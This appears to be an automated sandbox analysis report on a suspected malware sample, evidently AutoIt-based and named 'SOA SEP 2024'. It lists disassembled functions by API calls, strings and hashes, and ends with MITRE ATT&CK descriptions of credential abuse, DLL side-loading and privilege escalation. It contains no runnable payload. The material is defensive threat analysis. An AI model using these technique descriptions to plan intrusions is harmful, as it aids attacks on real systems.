Instruction ID: e0c7f02aad82af900ad24a73dd3b13a42e68b15ccd2a46cde6aa1400eba5ba86
Opcode Fuzzy Hash: aa6ad51817fadaf80ad6bd77ca357f86c77d3fd817b127c60193fae431249207
Instruction Fuzzy Hash: 623191B1600604DBEB24CF99D889BAEBBF5BFC6350F144229E985A61E0D7789A44CB50

Function 007B658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 007B6608

Strings

AUTOITCALLVARIABLE%d, xrefs: 007B65FA
, $, xrefs: 007B6648

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 69d0153161dcde94f48d928c6f0c486440371d764a50b982d2831996d754aec7
Instruction ID: 9199923f6f6a79d01631ee8c9026cfb15e01c046a6735d862e90aa0f583e6cab
Opcode Fuzzy Hash: 69d0153161dcde94f48d928c6f0c486440371d764a50b982d2831996d754aec7
Instruction Fuzzy Hash: A2215E71600218EBCF15EF64D886BED77B5BF45744F000469F906EB241DA7CEA45CBA1

Function 007C93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007C945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C9467

Strings

Combobox, xrefs: 007C9429

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 86f1e60c06c3ec1c4bace9fc421db3d53b229bcb18ddc7acaaeff877d34a1123
Instruction ID: ee95f67ffc1bd5c37d63adc6aedc6122874da3d86efcc92deba70d2c72eace06
Opcode Fuzzy Hash: 86f1e60c06c3ec1c4bace9fc421db3d53b229bcb18ddc7acaaeff877d34a1123
Instruction Fuzzy Hash: CF1190B1200248AFEF659E54DC88FAB376EEB583A4F10412DFA1897290D7399C528760

Function 007CDA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0077B34E: GetWindowLongW.USER32(?,000000EB), ref: 0077B35F

GetActiveWindow.USER32 ref: 007CDA7B
EnumChildWindows.USER32(?,007CD75F,00000000), ref: 007CDAF5

Strings

T1{, xrefs: 007CDAFB

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1{
API String ID: 3814560230-2508124280
Opcode ID: 6e1714d271b54f7c5691db7f0fa394d56586d6f51926d2d318ad4df4d755bb97
Instruction ID: aba6e9324e79f79eab8f55e95ae26dd84c61fd3e2b9dda33717fab328dbef27e
Opcode Fuzzy Hash: 6e1714d271b54f7c5691db7f0fa394d56586d6f51926d2d318ad4df4d755bb97
Instruction Fuzzy Hash: 61210C75204201DFCB24DF68D858AA977E5FB69320F25462DE96A873E0D734AC41CB50

Function 007C98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0077D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077D1BA
Part of subcall function 0077D17C: GetStockObject.GDI32(00000011), ref: 0077D1CE
Part of subcall function 0077D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077D1D8

GetWindowRect.USER32(00000000,?), ref: 007C9968
GetSysColor.USER32(00000012), ref: 007C9982

Strings

static, xrefs: 007C9945

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 51bc578d0b52e6539b43e2ae68aa009ee4c46f1e9453d2b972b41b866bbcaebb
Instruction ID: 05bbf2dd5af4f98835b495b8231146237ab58d742bcaa393245b96a6c631835d
Opcode Fuzzy Hash: 51bc578d0b52e6539b43e2ae68aa009ee4c46f1e9453d2b972b41b866bbcaebb
Instruction Fuzzy Hash: 8E111472520209AFDB14DFB8C849EEA7BA8FB48354F01462CFA55E2250E639E851DB60

Function 007C9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007C9699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007C96A8

Strings

edit, xrefs: 007C967D

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: fd84edd7a6df56be77056ca3fdfcc8d8778ef8d247b423c66c9efd2f62b49b96
Instruction ID: 7601707674e74d7e3dc1667410ff940015d2811e9aecaaa407aafca8558d1f07
Opcode Fuzzy Hash: fd84edd7a6df56be77056ca3fdfcc8d8778ef8d247b423c66c9efd2f62b49b96
Instruction Fuzzy Hash: 7C115871500108AAEF619F649C88FEB3B6AEB153B8F50431CFA65A72E0C639DC519764

Function 007A5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A52D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007A52F4

Strings

0, xrefs: 007A52CE

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 078e592c1d39f33d3a33c40349e42acb8d106e1fd534ab1a2253029eef1bbc4d
Instruction ID: 10a5a9d84968fa9db3f85e0731549d364f3ac417df8317973b7eabe025b6a28d
Opcode Fuzzy Hash: 078e592c1d39f33d3a33c40349e42acb8d106e1fd534ab1a2253029eef1bbc4d
Instruction Fuzzy Hash: BC11E2B2A01614EBDF20DB98D948B9D77B8BBC7754F150235E901E7290D3B8ED05CBA0

Function 007B4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007B4DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007B4E1E

Strings

<local>, xrefs: 007B4DE6

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 93154cb631d125764d092f04ce9b8731babd1b368d7b7efae3f56eed9da25d0b
Instruction ID: a33724b065fa01a79841f6f4174c0dcbadd69f8a0e3fe7c67ee87617f2207e36
Opcode Fuzzy Hash: 93154cb631d125764d092f04ce9b8731babd1b368d7b7efae3f56eed9da25d0b
Instruction Fuzzy Hash: 93117C70601221BBDB258F65C8C9FFBFAA8FF16755F10822AF61596141D3789980C6E0

Function 007BA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 007BA84E
htons.WSOCK32(00000000,?,00000000), ref: 007BA88B

Strings

255.255.255.255, xrefs: 007BA866

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: b1f662c6063fe28988468899a3e2660b7ec3ce3bf70cdd21891abd40d8d06fde
Instruction ID: 0642fc49a55ff227129c8cfb9f1482cd54f5d69859371f749d272eda839e26c7
Opcode Fuzzy Hash: b1f662c6063fe28988468899a3e2660b7ec3ce3bf70cdd21891abd40d8d06fde
Instruction Fuzzy Hash: B601D275200304BBCB22AF68D88AFEDB368EF45310F10852AF9169B6D1D779E8058756

Function 0079B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0079B7EF

Strings

ListBox, xrefs: 0079B7B9
ComboBox, xrefs: 0079B78B

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 56f4c809e0f4078e8c951252cf1e94f22f7777c64b2ce7b7f22b21ce9ed8eb81
Instruction ID: b0fc9a3a0f029a9e82dcdd0f0303bd430b4347c3d450cc0d8603d931cf168628
Opcode Fuzzy Hash: 56f4c809e0f4078e8c951252cf1e94f22f7777c64b2ce7b7f22b21ce9ed8eb81
Instruction Fuzzy Hash: 1101B1B1641124EBCF05EBA4EC56DFE33B9BF49350B04061DF8A2A72D2EB7D59188790

Function 0079B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 0079B6EB

Strings

ListBox, xrefs: 0079B6B5
ComboBox, xrefs: 0079B687

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 7994f34a8c655aa6e602b94ff6e249ec15ca637a4dcec4809617513ca6518efb
Instruction ID: 6a48e1057190ff42b22677d95c8a0e286807f2053ade1e1a4157627a8c67e343
Opcode Fuzzy Hash: 7994f34a8c655aa6e602b94ff6e249ec15ca637a4dcec4809617513ca6518efb
Instruction Fuzzy Hash: 7501A2B1641008EBCF15EBA4EA57AFE73BC9F05340F100019B842B3281DB9D6E2887B5

Function 0079B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 0079B76C

Strings

ListBox, xrefs: 0079B738
ComboBox, xrefs: 0079B70A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 4925a850877d083022cb4bd9b9cfdf420be832a1ee260a6b98f52375669f6469
Instruction ID: eb6b840e4f705e369ff18c04ca8645f4586c08ec61712d936eec37845b215e69
Opcode Fuzzy Hash: 4925a850877d083022cb4bd9b9cfdf420be832a1ee260a6b98f52375669f6469
Instruction Fuzzy Hash: 6F01D1B1641104EBCF12EBA4EA46EFE73AC9F05340F10011AB846B3292DB6D5E1987B5

Function 00764024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00760000,00000063,00000001,00000010,00000010,00000000), ref: 00764048
EnumResourceNamesW.KERNEL32(00000000,0000000E,007A67E9,00000063,00000000,75A90280,?,?,00763EE1,?,?,000000FF), ref: 007D41B3

Strings

>v, xrefs: 00764028

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >v
API String ID: 1578290342-479353832
Opcode ID: 094cead118adf29218dc114eb087587f44a19954a674a0659820cf12fcf4bf43
Instruction ID: 4383c4985c8c4b66edc8da1c2ab62ab3cf4f587262680955908906d39eecf741
Opcode Fuzzy Hash: 094cead118adf29218dc114eb087587f44a19954a674a0659820cf12fcf4bf43
Instruction Fuzzy Hash: 9BF0CD71250364B7EA304B1AAC4AF823AA8B728BB0F208116F610AA1D0D2F484918A94

Function 007A7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 007A7762
_wcscmp.LIBCMT ref: 007A7774

Strings

#32770, xrefs: 007A776E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: b3042fb3247f9b2132a8bf387c50e1609d20e8f5d2a94d3c523aee8dde43d99d
Instruction ID: 7cd5f259b7626ceadc889d68d8c64bb38d123f7dbdcf5ea539af087e0b692403
Opcode Fuzzy Hash: b3042fb3247f9b2132a8bf387c50e1609d20e8f5d2a94d3c523aee8dde43d99d
Instruction Fuzzy Hash: 54E022336003242BDB20EAE5AC09E87FBACEB91760F004016B914D3141E678AA4187D0

Function 0079A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0079A63F

Part of subcall function 007813F1: _doexit.LIBCMT ref: 007813FB

Strings

AutoIt, xrefs: 0079A633
Error allocating memory., xrefs: 0079A638

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 103a53f9d040826280564bc50d860113cc2a739217c4e6cc6edd48685cae3042
Instruction ID: 5cb9934f99adcea94cc6dafe57bab56569b02ca055615fb059ee4fd6898d433a
Opcode Fuzzy Hash: 103a53f9d040826280564bc50d860113cc2a739217c4e6cc6edd48685cae3042
Instruction Fuzzy Hash: E2D02B313C131873C62036A87C0FFC4364C8F08B91F044011FF0CD96C249DE8A9002D9

Function 007DAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 007DACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007DAEBD

Strings

WIN_XPe, xrefs: 007DACD3

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 04e4bf14ae99bca7070533363a73b8475847d25f2a4306f17c982b2c0208f56b
Instruction ID: c7d7be58fa036a1efe6c51c878b2a7382f2c81edf23660da1da522424febfbd1
Opcode Fuzzy Hash: 04e4bf14ae99bca7070533363a73b8475847d25f2a4306f17c982b2c0208f56b
Instruction Fuzzy Hash: D4E06DB0C10149EFCF21DBA4D984AECB7B8BB48301F14D082E146B6260CB385E84DF36

Function 007C86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C86E2
PostMessageW.USER32(00000000), ref: 007C86E9

Part of subcall function 007A7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A7AD0

Strings

Shell_TrayWnd, xrefs: 007C86DB

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 7de3f571846a77a3a7ee5221fdecaa71c9f8fd7683e73b3d189c79f4a5eae49e
Instruction ID: 135ec6694aec186f64718843a9517c3588375d772640aedb542ad8e55dfdd789
Opcode Fuzzy Hash: 7de3f571846a77a3a7ee5221fdecaa71c9f8fd7683e73b3d189c79f4a5eae49e
Instruction Fuzzy Hash: 68D0A931382354BBE23863309C4BFC66A08AB08B10F004814B205EE1C0C8A8AD40C628

Function 007C8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C86A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007C86B5

Part of subcall function 007A7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A7AD0

Strings

Shell_TrayWnd, xrefs: 007C869B

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: be8d1b0d2fec704c3fc633b307abd2dc1abfaf8718ab1408f8c63dd0f8322401
Instruction ID: d2911b021c4dc7cb2eec2bb62eb715337e8986a5e9d6a4127b9fed2454585b42
Opcode Fuzzy Hash: be8d1b0d2fec704c3fc633b307abd2dc1abfaf8718ab1408f8c63dd0f8322401
Instruction Fuzzy Hash: 48D0C931385354B7E67867709C4BFC66A18AB48B11F114915B649AE1D0C9A8AD50C668

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

